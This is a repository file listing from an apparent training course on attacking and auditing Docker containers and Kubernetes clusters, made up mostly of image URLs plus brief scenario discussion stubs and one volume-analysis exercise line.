https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/before-docker.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-exec.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-logs.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-pods.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-pods.png -------------------------------------------------------------------------------- /gitbook/kubesec/images/insecure-deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubesec/images/insecure-deployment.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/pull-private-image.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/pull-private-image.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/internal-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/internal-metadata.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/kube-env-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/kube-env-metadata.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/revert-and-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/revert-and-secrets.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/host-docker-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/host-docker-images.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/falco-detection.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/falco-detection.png -------------------------------------------------------------------------------- /github-images/k8s-docker-github-background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/github-images/k8s-docker-github-background.png -------------------------------------------------------------------------------- /gitbook/about-us/images/burp-suite-essentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/burp-suite-essentials.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/run-portainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/run-portainer.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/deploy-app-get-pods.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/deploy-app-get-pods.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-vm-login.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-vm-login.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/vm-networking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/vm-networking.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/kube-hunter-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/kube-hunter-results.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-combined.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-combined.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-explain.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-explain.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/custom-docker-socket.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/custom-docker-socket.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/helm-deploy-pwnchart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/helm-deploy-pwnchart.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/helm-with-host-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/helm-with-host-flag.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/sysdig-falco-start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/sysdig-falco-start.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-networks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-networks.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-volumes.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-volumes.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-select.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-select.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-setup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-setup.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/wordpress-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/wordpress-site.png -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/images/lsm-after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/apparmor-nginx-profile/images/lsm-after.png -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/images/lsm-before.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/apparmor-nginx-profile/images/lsm-before.png -------------------------------------------------------------------------------- /gitbook/docker-events/images/docker-system-events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-events/images/docker-system-events.png -------------------------------------------------------------------------------- /gitbook/docker-image-audit/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-image-audit/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-ova-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-ova-settings.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/select-ctf-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/select-ctf-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-vm-login.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-vm-login.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/kubectl-get-pods.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/kubectl-get-pods.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/kube-hunter-external.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/kube-hunter-external.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-auth-can-i.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-auth-can-i.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-delete-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-delete-pod.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-namespace.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-namespace.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-pods-wide.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-pods-wide.png -------------------------------------------------------------------------------- /gitbook/scenario-1/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-1/images/docker-registry-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/docker-registry-login.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/information-disclosure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/information-disclosure.png -------------------------------------------------------------------------------- /gitbook/scenario-2/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: 
[https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-3/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-4/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-4/images/extract-docker-binary.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/extract-docker-binary.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/host-docker-containers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/host-docker-containers.png -------------------------------------------------------------------------------- /gitbook/scenario-5/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: 
[https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-5/images/nmap-mysql-bruteforce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/nmap-mysql-bruteforce.png -------------------------------------------------------------------------------- /gitbook/scenario-6/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/sysdig-falco-scenario.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/sysdig-falco-scenario.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/select-student-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/select-student-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ssh-host-key-error.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ssh-host-key-error.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-cluster-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-cluster-info.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-describe-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-describe-pod.png -------------------------------------------------------------------------------- /gitbook/logging-and-monitoring/images/stack-driver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/logging-and-monitoring/images/stack-driver.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/source-code-hardcoded-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/source-code-hardcoded-key.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/kube-secrets-after-attack.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/kube-secrets-after-attack.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/container-and-commands.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/container-and-commands.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-service-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-service-access.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-service-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-service-create.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-dashboard.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capsh-print.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capsh-print.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/commit-log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/commit-log.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/pull-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/pull-docker.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-trust.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-trust.png -------------------------------------------------------------------------------- /gitbook/docker-logging/images/docker-logs-with-filters.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-logging/images/docker-logs-with-filters.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-ova-settings.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-ova-settings.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-hub.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-hub.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-ps-a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-ps-a.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-ps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-ps.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-deploy-portfwd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-deploy-portfwd.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-get-secret-yaml.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-get-secret-yaml.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/path-traversal-exploitation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/path-traversal-exploitation.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-images.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/kubectl-secrets-before-attack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/kubectl-secrets-before-attack.png -------------------------------------------------------------------------------- /gitbook/about-us/images/security-automation-with-ansible2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/security-automation-with-ansible2.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-compose-wordpress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-compose-wordpress.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-top.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-top.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-nginx-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-nginx-1.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-nginx-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-nginx-2.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-pid-host.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-pid-host.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-data-files.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-data-files.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-network-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-network-ls.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-tcp-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-tcp-socket.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-ls.png -------------------------------------------------------------------------------- 
/gitbook/docker-volumes-and-networks/scenario.md: -------------------------------------------------------------------------------- 1 | # Docker Volumes - Scenario 2 | 3 | * Identify the sensitive content in the docker volumes using volume analysis for volume `1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67` -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/nginxalpine-host.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/nginxalpine-host.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-capsh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-capsh.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capabilities-ping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capabilities-ping.png 
-------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/revert-and-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/revert-and-secrets.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-diff-changes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-diff-changes.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-system-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-system-info.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/vulners-audit-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/vulners-audit-site.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-build-image.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-build-image.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-detach-logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-detach-logs.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/helloworld-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/helloworld-docker.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-access.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/privileged-container.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/privileged-container.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/enter-into-container.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/enter-into-container.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/private-registry-list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/private-registry-list.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-bench-security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-bench-security.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-digest-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-digest-images.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-host-privileges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-host-privileges.png 
